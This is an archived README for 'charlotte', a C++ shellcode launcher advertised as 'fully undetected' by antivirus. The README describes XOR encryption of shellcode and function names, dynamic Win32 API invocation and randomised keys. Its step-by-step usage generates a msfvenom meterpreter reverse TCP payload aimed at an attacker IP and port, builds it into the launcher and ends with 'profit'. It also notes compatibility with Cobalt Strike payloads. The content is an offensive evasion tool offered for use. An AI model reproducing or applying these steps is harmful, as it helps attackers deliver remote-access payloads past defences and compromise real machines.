c++ fully undetected shellcode launcher ;)
charlotte
c++ fully undetected shellcode launcher ;)
releasing this to celebrate the birth of my newborn
description
- c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021.
- dynamic invoking of win32 api functions
- XOR encryption of shellcode and function names
- randomised XOR keys and variables per run
- on Kali Linux, simply 'apt-get install mingw-w64*' and thats it!
antiscan.me

usage
git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py
example:1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*2. cd charlotte3. msfvenom -p windows/x64/meterpreterreversetcp LHOST=$YOURIP LPORT=$YOURPORT -f raw > beacon.bin4. python charlotte.py5. profit
tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload

To restore the repository download the bundle
wget https://archive.org/download/github.com-9emin1-charlotte_-_2021-05-17_05-13-20/9emin1-charlotte_-_2021-05-17_05-13-20.bundle
and run:
git clone 9emin1-charlotte_-_2021-05-17_05-13-20.bundle
Source:
https://github.com/9emin1/charlotteUploader:
9emin1Upload date: 2021-05-17